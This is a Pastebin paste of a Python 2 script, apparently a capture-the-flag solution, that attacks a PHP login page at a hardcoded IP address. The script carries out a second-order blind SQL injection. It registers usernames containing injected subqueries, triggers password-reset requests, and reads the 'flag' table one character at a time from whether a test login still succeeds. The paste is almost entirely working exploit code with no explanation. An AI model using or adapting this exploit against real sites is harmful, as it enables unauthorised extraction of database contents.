SHARE
TWEET

Untitled

a guest Apr 14th, 2014 112 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import random,requests,string
  2.  
  3. #20BILLION_D0LLAR_1D3A <- flag
  4. #razor4x - tasteless
  5.  
  6. main="http://54.196.116.77/index.php?page=login"
  7. # reg "name=blah&pass=blah&email=blah&register=Register"
  8. # forgot name=blah&reset=Forgot+Password&pass=&email=
  9. # login name=blah&pass=blah&login=Login&email=
  10.  
  11. def randomword(length):
  12.    return ''.join(random.choice(string.lowercase) for i in range(length))
  13.  
  14. pwd=""
  15. for num in xrange(1,22):
  16.         for c in xrange(32,122):
  17.                 tmp_name=randomword(10)
  18.                 c=chr(c)
  19.                 #print "register the test name"
  20.                 payload = {'name': tmp_name, 'pass': tmp_name, "email":"asd","register":"Register"}
  21.                 r=requests.post(main,data=payload)
  22.                 #print r.text
  23.                 #print "register the exploit name"
  24.                 query=tmp_name+"' and (select if((select substr(flag,"+str(num)+",1) from flag)='"+c+"',1,2*(select 1 union select 2)))#"
  25.                 #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('"+c+"%'))=1,1,2*(select 1 union select 2))))-- -"
  26.                 #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('%'))=1,1,2*(select 1 union select 2))))-- -"
  27.                 payload = {'name': query, 'pass': "asd", "email":"asd","register":"Register"}
  28.                 r=requests.post(main,data=payload)
  29.                 #print r.text
  30.                 #print "forgot request"
  31.                 payload = {'name': query, 'pass': "", "email":"","reset":"Forgot+Password"}
  32.                 r=requests.post(main,data=payload)
  33.                 #print r.text
  34.                 #print "try to login with test name"
  35.                 payload = {'name': tmp_name, 'pass': tmp_name, "email":"","login":"Login"}
  36.                 r=requests.post(main,data=payload)
  37.                 #print r.text
  38.                 if 'Welcome' not in r.text:
  39.                         print "OK: "+c
  40.                         pwd+=c
  41.                         break
  42.                 else:
  43.                         print "Nope..."+c
  44.                        
  45.                
  46.                 #break
  47.         #break 
  48. print pwd
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top